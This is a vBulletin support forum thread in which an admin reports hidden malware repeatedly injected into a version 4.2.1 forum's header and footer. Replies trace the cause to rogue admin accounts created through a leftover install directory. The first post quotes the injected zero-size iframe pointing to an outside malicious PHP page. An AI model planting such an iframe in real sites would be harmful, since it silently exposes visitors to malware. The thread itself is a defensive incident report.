Announcement

Collapse
No announcement yet.

Header & footer malware inserted, default source vb 4.2.1.

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Header & footer malware inserted, default source vb 4.2.1.

    I keep having problems with my header and footer having malware links inserted. I changed all passwords... forum, user, server, etc. and the templates are reset to default but the line keeps reappearing with the following redirect:

    PHP Code:
     <iframe src="http://ferrerautoparts.com/ini.php" width="0" height="0" frameborder="0"></iframe
    I currently have my forum turned off and the footer was still compromised.

    I looked up the link and there are other vb forums showing complaints about it so I was wondering if this has been seen by anyone else in the VB group? I've also contacted the hosting company for ferrerautoparts.com to have the malware redirect link removed or the site shut down.

  • #2
    Install directory has been removed. Also ran Suspect File Versions and all seemed okay.

    Comment


    • #3
      Make sure that you do not have any unwanted PLUGINS installed!
      Cu Respect / Best Regards / Mit freundlichen Grüßen

      roStyles Design LLC
      CEO & Founder (Design and Support)
      Romanian Translator
      Teascu Dorin
      [email protected]
      https://www.rostyles.com

      Comment


      • #4
        Found 3 additional admin accounts: adminasx, optima, aventus67. Blocked their IP addresses and banned the accounts. I'll monitor the site and see if the header or footer changes again.

        This issue with having to delete the install directory - was this exploit allowing someone to enter the admin section and create extra accounts?

        IP address of the 3 hacker accounts as follows (in case anyone else has users matching these locations)::
        adminasx:
        46.165.201.35
        173.214.169.158
        85.17.58.128

        Optima: 151.248.125.184

        Aventus67: 88.230.120.188

        Comment


        • #5
          Yes, it was. Please raise a support ticket so we can have a look round and make sure everything is cleaned for you... Http://www.vbulletin.com/go/techsupport
          MARK.B | vBULLETIN SUPPORT

          TalkNewsUK - My vBulletin 5.5.4 Demo
          AdminAmmo - My Cloud Demo

          Comment

          widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
          Working...
          X